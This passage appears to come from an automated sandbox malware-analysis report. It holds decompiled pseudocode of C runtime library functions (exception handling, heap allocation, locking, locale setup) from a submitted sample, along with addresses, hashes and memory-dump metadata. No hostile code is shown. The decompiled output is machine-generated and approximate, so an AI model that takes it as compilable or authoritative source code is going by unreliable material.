				_t55 =  *((intOrPtr*)(_t58 + 0xc));
				_t57 =  *((intOrPtr*)(_t58 + 8));
				 *((intOrPtr*)(_t58 - 0x1c)) = __ecx;
				 *(_t58 - 0x34) =  *(_t58 - 0x34) & 0x00000000;
				 *((intOrPtr*)(_t58 - 0x24)) =  *((intOrPtr*)( *((intOrPtr*)(_t58 + 0xc)) - 4));
				 *((intOrPtr*)(_t58 - 0x28)) = E004087EC(_t58 - 0x3c,  *((intOrPtr*)(_t57 + 0x18)));
				 *((intOrPtr*)(_t58 - 0x2c)) =  *((intOrPtr*)(E0040DEA3(__ecx, _t53, _t61) + 0x88));
				 *((intOrPtr*)(_t58 - 0x30)) =  *((intOrPtr*)(E0040DEA3(_t48, _t53, _t61) + 0x8c));
				 *((intOrPtr*)(E0040DEA3(_t48, _t53, _t61) + 0x88)) = _t57;
				 *((intOrPtr*)(E0040DEA3(_t48, _t53, _t61) + 0x8c)) =  *((intOrPtr*)(_t58 + 0x10));
				 *(_t58 - 4) =  *(_t58 - 4) & 0x00000000;
				 *((intOrPtr*)(_t58 + 0x10)) = 1;
				 *(_t58 - 4) = 1;
				 *((intOrPtr*)(_t58 - 0x1c)) = E00408891(_t55,  *((intOrPtr*)(_t58 + 0x14)), _t48,  *((intOrPtr*)(_t58 + 0x18)),  *((intOrPtr*)(_t58 + 0x1c)));
				 *(_t58 - 4) =  *(_t58 - 4) & 0x00000000;
				 *(_t58 - 4) = 0xfffffffe;
				 *((intOrPtr*)(_t58 + 0x10)) = 0;
				E0040D3A9(_t48, _t55, _t57);
				return E0040EF7D( *((intOrPtr*)(_t58 - 0x1c)));
			}

0x0040d283
0x0040d285
0x0040d28a
0x0040d28f
0x0040d291
0x0040d294
0x0040d297
0x0040d29a
0x0040d2a1
0x0040d2b2
0x0040d2c0
0x0040d2ce
0x0040d2d6
0x0040d2e4
0x0040d2ea
0x0040d2f1
0x0040d2f4
0x0040d30a
0x0040d30d
0x0040d382
0x0040d389
0x0040d390
0x0040d39d

APIs

__CreateFrameInfo.LIBCMT ref: 0040D2AB

Part of subcall function 004087EC: __getptd.LIBCMT ref: 004087FA
Part of subcall function 004087EC: __getptd.LIBCMT ref: 00408808

__getptd.LIBCMT ref: 0040D2B5

Part of subcall function 0040DEA3: __getptd_noexit.LIBCMT ref: 0040DEA6
Part of subcall function 0040DEA3: __amsg_exit.LIBCMT ref: 0040DEB3

__getptd.LIBCMT ref: 0040D2C3
__getptd.LIBCMT ref: 0040D2D1
__getptd.LIBCMT ref: 0040D2DC
_CallCatchBlock2.LIBCMT ref: 0040D302

Part of subcall function 00408891: __CallSettingFrame@12.LIBCMT ref: 004088DD

Part of subcall function 0040D3A9: __getptd.LIBCMT ref: 0040D3B8
Part of subcall function 0040D3A9: __getptd.LIBCMT ref: 0040D3C6

Memory Dump Source

Source File: 00000000.00000002.253878180.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.253870257.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.253948004.000000000041D000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.253956117.0000000000420000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.254006910.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.254029990.0000000000589000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.254035159.000000000058B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_P2SMn3jloH.jbxd

Similarity

API ID: __getptd$Call$Block2CatchCreateFrameFrame@12InfoSetting__amsg_exit__getptd_noexit
String ID:
API String ID: 1602911419-0
Opcode ID: fdb54817555d764e123fedf5d2765495e1d6fe838cf628365064930c0acc2dda
Instruction ID: ae52302a46f3c4effc3c6ab00d3fd4dbe04edd1ea2b168d13cbfd4d74c9cb38f
Opcode Fuzzy Hash: fdb54817555d764e123fedf5d2765495e1d6fe838cf628365064930c0acc2dda
Instruction Fuzzy Hash: 5411E7B1C1420A9FDB00EFA5C545B9D77B0BF04318F50846AF854AB291DB7C9A159B94

Uniqueness

Uniqueness Score: -1.00%

Function 0040892E Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 34
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 83%

			E0040892E(char _a4) {
				signed int _v16;
				char _v20;
				long _v24;
				signed int _v32;
				void* _v36;
				long _v40;
				void _v60;
				void* __edi;
				void* _t20;
				signed int _t21;
				signed int _t26;
				DWORD* _t27;
				void* _t30;
				signed int _t34;
				void* _t38;

				while(1) {
					_t2 =  &_a4; // 0x405c25
					_t20 = E0040B500(_t30, _t38,  *_t2);
					if(_t20 != 0) {
						break;
					}
					_t21 = E0040E26B(_a4);
					__eflags = _t21;
					if(_t21 == 0) {
						__eflags =  *0x5890c0 & 0x00000001;
						if(( *0x5890c0 & 0x00000001) == 0) {
							 *0x5890c0 =  *0x5890c0 | 0x00000001;
							__eflags =  *0x5890c0;
							E00408913(0x5890b4);
							E00408F48( *0x5890c0, 0x41bc3a);
						}
						E00405C4F( &_v16, 0x5890b4);
						_push(0x41dc84);
						_push( &_v16);
						L7();
						asm("int3");
						_push(0x5890b4);
						_push(_t38);
						_t34 = 8;
						_v36 = memcpy( &_v60, 0x40164c, _t34 << 2);
						_t26 = _v16;
						_v32 = _t26;
						__eflags = _t26;
						if(_t26 != 0) {
							__eflags =  *_t26 & 0x00000008;
							if(( *_t26 & 0x00000008) != 0) {
								_v20 = 0x1994000;
							}
						}
						_t27 =  &_v20;
						RaiseException(_v40, _v36, _v24, _t27);
						return _t27;
					} else {
						continue;
					}
					L11:
				}
				return _t20;
				goto L11;
			}

0x00408945
0x00408945
0x00408948
0x00408950
0x00000000
0x00000000
0x0040893b
0x00408941
0x00408943
0x00408954
0x00408960
0x00408962
0x00408962
0x0040896b
0x00408975
0x0040897a
0x0040897f
0x00408984
0x0040898c
0x0040898d
0x00408992
0x0040899e
0x0040899f
0x004089a2
0x004089ad
0x004089b0
0x004089b4
0x004089b8
0x004089ba
0x004089bc
0x004089bf
0x004089c1
0x004089c1
0x004089bf
0x004089c8
0x004089d5
0x004089dc
0x00000000
0x00000000
0x00000000
0x00000000
0x00408943
0x00408953
0x00000000

APIs

_malloc.LIBCMT ref: 00408948

Part of subcall function 0040B500: __FF_MSGBANNER.LIBCMT ref: 0040B523
Part of subcall function 0040B500: __NMSG_WRITE.LIBCMT ref: 0040B52A
Part of subcall function 0040B500: RtlAllocateHeap.NTDLL(00000000,?,?,?,00000001,?,0040807B,00000001,?,?,?,?,?,00404C2F,?), ref: 0040B577

std::bad_alloc::bad_alloc.LIBCMT ref: 0040896B

Part of subcall function 00408913: std::exception::exception.LIBCMT ref: 0040891F

std::bad_exception::bad_exception.LIBCMT ref: 0040897F
__CxxThrowException@8.LIBCMT ref: 0040898D

Strings

%\@, xrefs: 00408945

Memory Dump Source

Source File: 00000000.00000002.253878180.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.253870257.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.253948004.000000000041D000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.253956117.0000000000420000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.254006910.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.254029990.0000000000589000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.254035159.000000000058B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_P2SMn3jloH.jbxd

Similarity

API ID: AllocateException@8HeapThrow_mallocstd::bad_alloc::bad_allocstd::bad_exception::bad_exceptionstd::exception::exception
String ID: %\@
API String ID: 1411284514-2702511825
Opcode ID: 82b8852194485d5dacbc81d7ec5f407009dd89cd278afea175055624b4359e15
Instruction ID: 52eb9eca0bdddc760c4daa140dcd042913d1a06dbc779fed389826f51c154f90
Opcode Fuzzy Hash: 82b8852194485d5dacbc81d7ec5f407009dd89cd278afea175055624b4359e15
Instruction Fuzzy Hash: B7F0E270904209A2DF047722DD0AA7E3BA8AB0175CB24007FFC81751E2EF7C9A45D28E

Uniqueness

Uniqueness Score: -1.00%

Function 0040CFD2 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 22
COMMON

Download Yara Rule

C-Code - Quality: 73%

			E0040CFD2(void* __edx, intOrPtr* _a4) {
				signed int _v8;
				intOrPtr _t11;
				intOrPtr* _t15;
				intOrPtr* _t19;
				void* _t23;
				void* _t25;
				void* _t26;

				_t24 = __edx;
				_t11 =  *((intOrPtr*)( *_a4));
				if(_t11 == 0xe0434f4d) {
					__eflags =  *((intOrPtr*)(E0040DEA3(_t23, __edx, __eflags) + 0x90));
					if(__eflags > 0) {
						_t15 = E0040DEA3(_t23, __edx, __eflags) + 0x90;
						 *_t15 =  *_t15 - 1;
						__eflags =  *_t15;
					}
					goto L5;
				} else {
					_t32 = _t11 - 0xe06d7363;
					if(_t11 != 0xe06d7363) {
						L5:
						__eflags = 0;
						return 0;
					} else {
						 *(E0040DEA3(_t23, __edx, _t32) + 0x90) =  *(_t16 + 0x90) & 0x00000000;
						_push(8);
						_push(0x41e520);
						E0040EF38(_t23, _t25, _t26);
						_t19 =  *((intOrPtr*)(E0040DEA3(_t23, __edx, _t32) + 0x78));
						if(_t19 != 0) {
							_v8 = _v8 & 0x00000000;
							 *_t19();
							_v8 = 0xfffffffe;
						}
						return E0040EF7D(E00408F5F(_t23, _t24, _t25, _t26));
					}
				}
			}

0x0040cfd2
0x0040cfdc
0x0040cfe3
0x0040d002
0x0040d009
0x0040d010
0x0040d015
0x0040d015
0x0040d015
0x00000000
0x0040cfe5
0x0040cfe5
0x0040cfea
0x0040d017
0x0040d017
0x0040d01a
0x0040cfec
0x0040cff1
0x0040e179
0x0040e17b
0x0040e180
0x0040e18a
0x0040e18f
0x0040e191
0x0040e195
0x0040e1a0
0x0040e1a0
0x0040e1b1
0x0040e1b1
0x0040cfea

APIs

__getptd.LIBCMT ref: 0040CFEC

Part of subcall function 0040DEA3: __getptd_noexit.LIBCMT ref: 0040DEA6
Part of subcall function 0040DEA3: __amsg_exit.LIBCMT ref: 0040DEB3

__getptd.LIBCMT ref: 0040CFFD
__getptd.LIBCMT ref: 0040D00B

Strings

MOC, xrefs: 0040CFDE
csm, xrefs: 0040CFE5

Memory Dump Source

Source File: 00000000.00000002.253878180.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.253870257.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.253948004.000000000041D000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.253956117.0000000000420000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.254006910.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.254029990.0000000000589000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.254035159.000000000058B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_P2SMn3jloH.jbxd

Similarity

API ID: __getptd$__amsg_exit__getptd_noexit
String ID: MOC$csm
API String ID: 803148776-1389381023
Opcode ID: 6635adbae74f83e2564532d45bb79240dc25a11986ffad02d9b41b795916e814
Instruction ID: 758181b82ad84b3b8dd93517e69ef017ef5c1e08a000de8bff1621ca7a12916d
Opcode Fuzzy Hash: 6635adbae74f83e2564532d45bb79240dc25a11986ffad02d9b41b795916e814
Instruction Fuzzy Hash: 6DE01A359001048FD710AFE9C046B2932A4EB99318F1504B7A40CEB3A2C73CE859A68A

Uniqueness

Uniqueness Score: -1.00%

Function 00411644 Relevance: 7.5, APIs: 5, Instructions: 47
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 89%

			E00411644(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				signed int _t15;
				LONG* _t21;
				long _t23;
				void* _t31;
				LONG* _t33;
				void* _t34;
				void* _t35;

				_t35 = __eflags;
				_t29 = __edx;
				_t25 = __ebx;
				_push(0xc);
				_push(0x41e600);
				E0040EF38(__ebx, __edi, __esi);
				_t31 = E0040DEA3(__ebx, __edx, _t35);
				_t15 =  *0x4311f0; // 0xfffffffe
				if(( *(_t31 + 0x70) & _t15) == 0 ||  *((intOrPtr*)(_t31 + 0x6c)) == 0) {
					E0040E43F(_t25, _t31, 0xd);
					 *(_t34 - 4) =  *(_t34 - 4) & 0x00000000;
					_t33 =  *(_t31 + 0x68);
					 *(_t34 - 0x1c) = _t33;
					__eflags = _t33 -  *0x4310f8; // 0x21a2bb8
					if(__eflags != 0) {
						__eflags = _t33;
						if(_t33 != 0) {
							_t23 = InterlockedDecrement(_t33);
							__eflags = _t23;
							if(_t23 == 0) {
								__eflags = _t33 - 0x430cd0;
								if(__eflags != 0) {
									_push(_t33);
									E004089EA(_t25, _t31, _t33, __eflags);
								}
							}
						}
						_t21 =  *0x4310f8; // 0x21a2bb8
						 *(_t31 + 0x68) = _t21;
						_t33 =  *0x4310f8; // 0x21a2bb8
						 *(_t34 - 0x1c) = _t33;
						InterlockedIncrement(_t33);
					}
					 *(_t34 - 4) = 0xfffffffe;
					E004116DF();
				} else {
					_t33 =  *(_t31 + 0x68);
				}
				if(_t33 == 0) {
					E0040F461(_t29, 0x20);
				}
				return E0040EF7D(_t33);
			}

0x00411644
0x00411644
0x00411644
0x00411644
0x00411646
0x0041164b
0x00411655
0x00411657
0x0041165f
0x00411680
0x00411686
0x0041168a
0x0041168d
0x00411690
0x00411696
0x00411698
0x0041169a
0x0041169d
0x004116a3
0x004116a5
0x004116a7
0x004116ad
0x004116af
0x004116b0
0x004116b5
0x004116ad
0x004116a5
0x004116b6
0x004116bb
0x004116be
0x004116c4
0x004116c8
0x004116c8
0x004116ce
0x004116d5
0x00411667
0x00411667
0x00411667
0x0041166c
0x00411670
0x00411675
0x0041167d

APIs

__getptd.LIBCMT ref: 00411650

Part of subcall function 0040DEA3: __getptd_noexit.LIBCMT ref: 0040DEA6
Part of subcall function 0040DEA3: __amsg_exit.LIBCMT ref: 0040DEB3

__amsg_exit.LIBCMT ref: 00411670
__lock.LIBCMT ref: 00411680
InterlockedDecrement.KERNEL32(?), ref: 0041169D
InterlockedIncrement.KERNEL32(021A2BB8), ref: 004116C8

Memory Dump Source

Source File: 00000000.00000002.253878180.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.253870257.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.253948004.000000000041D000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.253956117.0000000000420000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.254006910.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.254029990.0000000000589000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.254035159.000000000058B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_P2SMn3jloH.jbxd

Similarity

API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock
String ID:
API String ID: 4271482742-0
Opcode ID: b97259540d5613925d6a5ec233832afa4c94a253ec52663c2bf6152d33804290
Instruction ID: c411eaf418b0c070455f6fdc077d232cb9d96ce55476f56f8c850ce47e0a8d7e
Opcode Fuzzy Hash: b97259540d5613925d6a5ec233832afa4c94a253ec52663c2bf6152d33804290
Instruction Fuzzy Hash: 7601A131E0062297C724AF668806BDA77A06B00714F08412BE904776F0CB3D6CD5CBCD

Uniqueness

Uniqueness Score: -1.00%

Function 004089EA Relevance: 7.5, APIs: 5, Instructions: 44
memoryCOMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 39%

			E004089EA(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr* _t10;
				intOrPtr _t13;
				intOrPtr _t23;
				void* _t25;

				_push(0xc);
				_push(0x41e230);
				_t8 = E0040EF38(__ebx, __edi, __esi);
				_t23 =  *((intOrPtr*)(_t25 + 8));
				if(_t23 == 0) {
					L9:
					return E0040EF7D(_t8);
				}
				if( *0x58add4 != 3) {
					_push(_t23);
					L7:
					if(HeapFree( *0x589108, 0, ??) == 0) {
						_t10 = E0040B78C();
						 *_t10 = E0040B74A(GetLastError());
					}
					goto L9;
				}
				E0040E43F(__ebx, __edi, 4);
				 *(_t25 - 4) =  *(_t25 - 4) & 0x00000000;
				_t13 = E0040E472(_t23);
				 *((intOrPtr*)(_t25 - 0x1c)) = _t13;
				if(_t13 != 0) {
					_push(_t23);
					_push(_t13);
					E0040E4A2();
				}
				 *(_t25 - 4) = 0xfffffffe;
				_t8 = E00408A40();
				if( *((intOrPtr*)(_t25 - 0x1c)) != 0) {
					goto L9;
				} else {
					_push( *((intOrPtr*)(_t25 + 8)));
					goto L7;
				}
			}

0x004089ea
0x004089ec
0x004089f1
0x004089f6
0x004089fb
0x00408a72
0x00408a77
0x00408a77
0x00408a04
0x00408a49
0x00408a4a
0x00408a5a
0x00408a5c
0x00408a6f
0x00408a71
0x00000000
0x00408a5a
0x00408a08
0x00408a0e
0x00408a13
0x00408a19
0x00408a1e
0x00408a20
0x00408a21
0x00408a22
0x00408a28
0x00408a29
0x00408a30
0x00408a39
0x00000000
0x00408a3b
0x00408a3b
0x00000000
0x00408a3b

APIs

__lock.LIBCMT ref: 00408A08

Part of subcall function 0040E43F: __mtinitlocknum.LIBCMT ref: 0040E455
Part of subcall function 0040E43F: __amsg_exit.LIBCMT ref: 0040E461
Part of subcall function 0040E43F: EnterCriticalSection.KERNEL32(?,?,?,00412359,00000004,0041E640,0000000C,0040A2F0,?,?,00000000,00000000,00000000,?,0040DE55,00000001), ref: 0040E469

___sbh_find_block.LIBCMT ref: 00408A13
___sbh_free_block.LIBCMT ref: 00408A22
HeapFree.KERNEL32(00000000,?,0041E230,0000000C,0040E420,00000000,0041E560,0000000C,0040E45A,?,?,?,00412359,00000004,0041E640,0000000C), ref: 00408A52
GetLastError.KERNEL32(?,00412359,00000004,0041E640,0000000C,0040A2F0,?,?,00000000,00000000,00000000,?,0040DE55,00000001,00000214), ref: 00408A63

Memory Dump Source

Source File: 00000000.00000002.253878180.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.253870257.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.253948004.000000000041D000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.253956117.0000000000420000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.254006910.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.254029990.0000000000589000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.254035159.000000000058B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_P2SMn3jloH.jbxd

Similarity

API ID: CriticalEnterErrorFreeHeapLastSection___sbh_find_block___sbh_free_block__amsg_exit__lock__mtinitlocknum
String ID:
API String ID: 2714421763-0
Opcode ID: 45dfd8635cdffa17334fd3b8c630c3eb47b24f95574543ef1acbf92944ac0c0f
Instruction ID: 06907ccf3af6a701bc4d47315f5231b4e973fa5a3009c28bc1da32c29bfb126b
Opcode Fuzzy Hash: 45dfd8635cdffa17334fd3b8c630c3eb47b24f95574543ef1acbf92944ac0c0f
Instruction Fuzzy Hash: BF018F31A01201AADB206BB29E0AB9F3A649F00324F14443FF580B65D1DF3C8840AF9D

Uniqueness

Uniqueness Score: -1.00%

Function 0040D630 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 42
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 19%

			E0040D630(void* __ebx, intOrPtr* __edi, void* __esi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28) {
				void* __ebp;
				void* _t20;
				void* _t22;
				void* _t23;
				intOrPtr* _t25;
				void* _t26;
				void* _t27;

				_t26 = __esi;
				_t25 = __edi;
				_t22 = __ebx;
				_t29 = _a20;
				if(_a20 != 0) {
					_push(_a20);
					_push(__ebx);
					_push(__esi);
					_push(_a4);
					E0040D59E(__ebx, __edi, __esi, _t29);
					_t27 = _t27 + 0x10;
				}
				_t30 = _a28;
				_push(_a4);
				if(_a28 != 0) {
					_push(_a28);
				} else {
					_push(_t26);
				}
				E00408544(_t23);
				_push( *_t25);
				_push(_a16);
				_push(_a12);
				_push(_t26);
				E0040D01B(_t22, _t25, _t26, _t30);
				_push(0x100);
				_push(_a24);
				_push(_a16);
				 *((intOrPtr*)(_t26 + 8)) =  *((intOrPtr*)(_t25 + 4)) + 1;
				_push(_a8);
				_push(_t26);
				_push(_a4);
				_t20 = E0040D283( *((intOrPtr*)(_t22 + 0xc)));
				if(_t20 != 0) {
					E0040850B(_t20, _t26);
					return _t20;
				}
				return _t20;
			}

0x0040d630
0x0040d630
0x0040d630
0x0040d635
0x0040d639
0x0040d63b
0x0040d63e
0x0040d63f
0x0040d640
0x0040d643
0x0040d648
0x0040d648
0x0040d64b
0x0040d64f
0x0040d652
0x0040d657
0x0040d654
0x0040d654
0x0040d654
0x0040d65a
0x0040d65f
0x0040d661
0x0040d664
0x0040d667
0x0040d668
0x0040d670
0x0040d675
0x0040d679
0x0040d67c
0x0040d67f
0x0040d685
0x0040d686
0x0040d689
0x0040d693
0x0040d697
0x00000000
0x0040d697
0x0040d69d

APIs

___BuildCatchObject.LIBCMT ref: 0040D643

Part of subcall function 0040D59E: ___BuildCatchObjectHelper.LIBCMT ref: 0040D5D4

_UnwindNestedFrames.LIBCMT ref: 0040D65A
___FrameUnwindToState.LIBCMT ref: 0040D668

Strings

csm, xrefs: 0040D63F, 0040D654, 0040D667, 0040D685, 0040D695

Memory Dump Source

Source File: 00000000.00000002.253878180.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.253870257.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.253948004.000000000041D000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.253956117.0000000000420000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.254006910.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.254029990.0000000000589000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.254035159.000000000058B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_P2SMn3jloH.jbxd

Similarity

API ID: BuildCatchObjectUnwind$FrameFramesHelperNestedState
String ID: csm
API String ID: 2163707966-1018135373
Opcode ID: 25d8f618258f81dc1646f63685c30713fbebdeec88f6bdfe8158e0d249168221
Instruction ID: 2413127afbe983dbee97c3d26ee7aff4e4fd1c2d8a586a52dd260a433ed668e8
Opcode Fuzzy Hash: 25d8f618258f81dc1646f63685c30713fbebdeec88f6bdfe8158e0d249168221
Instruction Fuzzy Hash: 6C012831801109BBCF126F91CC41EAB7F6AEF08358F00442ABD0C251A1D73AD9A6DBA9

Uniqueness

Uniqueness Score: -1.00%

Function 0040C6AA Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 38
libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 65%

			E0040C6AA() {
				signed long long _v12;
				signed int _v20;
				signed long long _v28;
				signed char _t8;

				_t8 = GetModuleHandleA("KERNEL32");
				if(_t8 == 0) {
					L6:
					_v20 =  *0x401fb0;
					_v28 =  *0x401fa8;
					asm("fsubr qword [ebp-0x18]");
					_v12 = _v28 / _v20 * _v20;
					asm("fld1");
					asm("fcomp qword [ebp-0x8]");
					asm("fnstsw ax");
					if((_t8 & 0x00000005) != 0) {
						return 0;
					} else {
						return 1;
					}
				} else {
					__eax = GetProcAddress(__eax, "IsProcessorFeaturePresent");
					if(__eax == 0) {
						goto L6;
					} else {
						_push(0);
						return __eax;
					}
				}
			}

0x0040c6af
0x0040c6b7
0x0040c6ce
0x0040c67a
0x0040c683
0x0040c68f
0x0040c692
0x0040c695
0x0040c697
0x0040c69a
0x0040c69f
0x0040c6a9
0x0040c6a1
0x0040c6a5
0x0040c6a5
0x0040c6b9
0x0040c6bf
0x0040c6c7
0x00000000
0x0040c6c9
0x0040c6c9
0x0040c6cd
0x0040c6cd
0x0040c6c7

APIs

GetModuleHandleA.KERNEL32(KERNEL32,00408377), ref: 0040C6AF
GetProcAddress.KERNEL32(00000000,IsProcessorFeaturePresent), ref: 0040C6BF

Strings

KERNEL32, xrefs: 0040C6AA
IsProcessorFeaturePresent, xrefs: 0040C6B9

Memory Dump Source

Source File: 00000000.00000002.253878180.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.253870257.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.253948004.000000000041D000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.253956117.0000000000420000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.254006910.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.254029990.0000000000589000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.254035159.000000000058B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_P2SMn3jloH.jbxd

Similarity

API ID: AddressHandleModuleProc
String ID: IsProcessorFeaturePresent$KERNEL32
API String ID: 1646373207-3105848591
Opcode ID: 262890f937c88bf92e2b03ead55db27850306e213ed55d0593015dd89f505259
Instruction ID: f6d0852723c501d8bd8d87498f3f12253c76d51d564ebb4b4919d4f89cb4afc2
Opcode Fuzzy Hash: 262890f937c88bf92e2b03ead55db27850306e213ed55d0593015dd89f505259
Instruction Fuzzy Hash: A4F0363190090AE2DF101BB1BD8966F7A75BB80742F9109A1E1D1B00E4DF798075D259

Uniqueness

Uniqueness Score: -1.00%

Function 00406512 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 28
COMMON

Download Yara Rule

C-Code - Quality: 91%

			E00406512(intOrPtr __ecx) {
				intOrPtr _t11;
				void* _t20;
				intOrPtr _t21;
				void* _t23;

				E004088F4(E0041B945, _t23);
				_push(__ecx);
				_t21 = __ecx;
				 *((intOrPtr*)(_t23 - 0x10)) = __ecx;
				 *((intOrPtr*)(__ecx)) = 0x401478;
				E00407EAA(__ecx + 4);
				 *(_t23 - 4) =  *(_t23 - 4) & 0x00000000;
				if(E0040892E(4, _t20) == 0) {
					_t11 = 0;
				} else {
					_t11 = E00404DB6(_t10);
				}
				 *((intOrPtr*)(_t21 + 0x38)) = _t11;
				E00405B42(_t21);
				 *[fs:0x0] =  *((intOrPtr*)(_t23 - 0xc));
				return _t21;
			}

0x00406517
0x0040651c
0x0040651e
0x00406523
0x00406526
0x0040652c
0x00406531
0x0040653f
0x0040654a
0x00406541
0x00406543
0x00406543
0x0040654e
0x00406551
0x0040655c
0x00406564

APIs

__EH_prolog.LIBCMT ref: 00406517
std::_Mutex::_Mutex.LIBCPMT ref: 0040652C

Part of subcall function 0040892E: _malloc.LIBCMT ref: 00408948

std::locale::locale.LIBCPMT ref: 00406543

Part of subcall function 00404DB6: std::locale::_Init.LIBCPMT ref: 00404DB9
Part of subcall function 00404DB6: std::locale::facet::_Incref.LIBCPMT ref: 00404DC7

Strings

md@, xrefs: 00406526

Memory Dump Source

Source File: 00000000.00000002.253878180.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.253870257.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.253948004.000000000041D000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.253956117.0000000000420000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.254006910.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.254029990.0000000000589000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.254035159.000000000058B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_P2SMn3jloH.jbxd

Similarity

API ID: H_prologIncrefInitMutexMutex::__mallocstd::_std::locale::_std::locale::facet::_std::locale::locale
String ID: md@
API String ID: 3605895379-3355668050
Opcode ID: 25614b8f63471a171e1313490e958568aaf7ff6a74c3a66878e4c500a15b2e87
Instruction ID: 23c6b60d026b240c0280e98547af473300732b566c8aaa53a888c3382c208aa0
Opcode Fuzzy Hash: 25614b8f63471a171e1313490e958568aaf7ff6a74c3a66878e4c500a15b2e87
Instruction Fuzzy Hash: A0F030B1A106119AC758ABA999117AAB2E4EF44718F10447FA552F36C1DFBCA8008A99

Uniqueness

Uniqueness Score: -1.00%

Function 00407F62 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 28
